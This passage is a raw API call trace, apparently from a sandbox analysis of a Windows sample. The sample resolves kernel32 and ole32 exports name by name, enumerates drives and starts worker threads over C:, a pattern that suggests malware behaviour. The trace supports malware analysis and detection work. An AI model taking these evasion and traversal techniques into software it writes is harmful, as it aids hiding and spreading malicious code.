[0071.052] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0071.052] lstrlenA (lpString="CREATEFILEW") returned 11 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0071.052] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0071.052] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0071.052] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0071.052] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0071.052] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0071.052] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0071.052] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0071.052] lstrlenA (lpString="CREATEJOBSET") returned 12 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0071.052] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0071.052] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0071.052] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0071.052] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0071.053] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0071.053] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0071.053] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0071.053] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0071.053] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0071.053] lstrlenA (lpString="CREATEPIPE") returned 10 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0071.053] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0071.053] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0071.053] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0071.053] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0071.053] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0071.053] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0071.053] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0071.053] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0071.053] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0071.053] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0071.053] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0071.053] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0071.053] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0071.053] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0071.054] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0071.054] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0071.054] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0071.054] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0071.054] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0071.054] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0071.054] lstrlenA (lpString="CREATETHREAD") returned 12 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0071.054] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0071.054] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0071.054] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0071.054] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0071.054] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0071.054] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0071.054] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0071.054] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0071.054] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0071.054] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0071.054] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0071.055] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0071.055] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0071.055] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0071.055] lstrlenA (lpString="CTRLROUTINE") returned 11 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0071.055] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0071.055] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0071.055] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0071.055] lstrlenA (lpString="DEBUGBREAK") returned 10 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0071.055] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0071.055] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0071.055] lstrlenA (lpString="DECODEPOINTER") returned 13 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0071.055] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0071.055] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0071.055] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0071.055] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0071.055] lstrlenA (lpString="DELETEATOM") returned 10 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0071.055] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0071.055] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0071.055] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0071.056] lstrlenA (lpString="DELETEFIBER") returned 11 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0071.056] lstrlenA (lpString="DELETEFILEA") returned 11 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0071.056] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0071.056] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0071.056] lstrlenA (lpString="DELETEFILEW") returned 11 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0071.056] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0071.056] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0071.056] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0071.056] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0071.056] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0071.056] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0071.056] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0071.056] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0071.056] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0071.056] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0071.056] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0071.056] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0071.056] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0071.056] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0071.057] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0071.057] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0071.057] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0071.057] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0071.057] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0071.057] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0071.057] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0071.057] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0071.057] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0071.057] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0071.057] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0071.057] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0071.057] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0071.057] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0071.057] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0071.057] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0071.057] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0071.057] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0071.057] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0071.057] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0071.058] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0071.058] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0071.058] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0071.058] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0071.058] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0071.058] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0xf10000 | out: lpBuffer="C:\\") returned 0x4 [0071.059] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0071.059] lstrlenW (lpString="C:\\") returned 3 [0071.059] VirtualAlloc (lpAddress=0x0, dwSize=0x5006, flAllocationType=0x3000, flProtect=0x4) returned 0xf80000 [0071.059] lstrcpyW (in: lpString1=0xf80000, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0071.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x943c0, lpParameter=0xf20000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3fc [0071.061] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x946e0, lpParameter=0xc9f684, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x404 [0071.062] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc9f68c*=0x3fc, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0090.214] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0090.214] GetTickCount64 () returned 0x114efbc [0090.217] lstrcpyW (in: lpString1=0xc9f5d4, lpString2="9cda09f29c354b42" | out: lpString1="9cda09f29c354b42") returned="9cda09f29c354b42" [0090.217] lstrlenW (lpString="9cda09f29c354b42") returned 16 [0090.223] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0xf20000 [0090.224] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0xf80000 [0090.224] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0090.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x729c0, lpParameter=0xf80000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x408 [0090.225] CloseHandle (hObject=0x408) returned 1 [0090.225] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.232] lstrlenA (lpString="ole32.dll") returned 9 [0090.232] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="BindMoniker" | out: lpString1="BindMoniker") returned="BindMoniker" [0090.232] lstrlenA (lpString="BINDMONIKER") returned 11 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserFree" | out: lpString1="CLIPFORMAT_UserFree") returned="CLIPFORMAT_UserFree" [0090.232] lstrlenA (lpString="CLIPFORMAT_USERFREE") returned 19 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserMarshal" | out: lpString1="CLIPFORMAT_UserMarshal") returned="CLIPFORMAT_UserMarshal" [0090.232] lstrlenA (lpString="CLIPFORMAT_USERMARSHAL") returned 22 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserSize" | out: lpString1="CLIPFORMAT_UserSize") returned="CLIPFORMAT_UserSize" [0090.232] lstrlenA (lpString="CLIPFORMAT_USERSIZE") returned 19 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLIPFORMAT_UserUnmarshal" | out: lpString1="CLIPFORMAT_UserUnmarshal") returned="CLIPFORMAT_UserUnmarshal" [0090.232] lstrlenA (lpString="CLIPFORMAT_USERUNMARSHAL") returned 24 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromOle1Class" | out: lpString1="CLSIDFromOle1Class") returned="CLSIDFromOle1Class" [0090.232] lstrlenA (lpString="CLSIDFROMOLE1CLASS") returned 18 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromProgID" | out: lpString1="CLSIDFromProgID") returned="CLSIDFromProgID" [0090.232] lstrlenA (lpString="CLSIDFROMPROGID") returned 15 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromProgIDEx" | out: lpString1="CLSIDFromProgIDEx") returned="CLSIDFromProgIDEx" [0090.232] lstrlenA (lpString="CLSIDFROMPROGIDEX") returned 17 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CLSIDFromString" | out: lpString1="CLSIDFromString") returned="CLSIDFromString" [0090.232] lstrlenA (lpString="CLSIDFROMSTRING") returned 15 [0090.232] lstrcpyA (in: lpString1=0xc9e500, lpString2="CoAddRefServerProcess" | out: 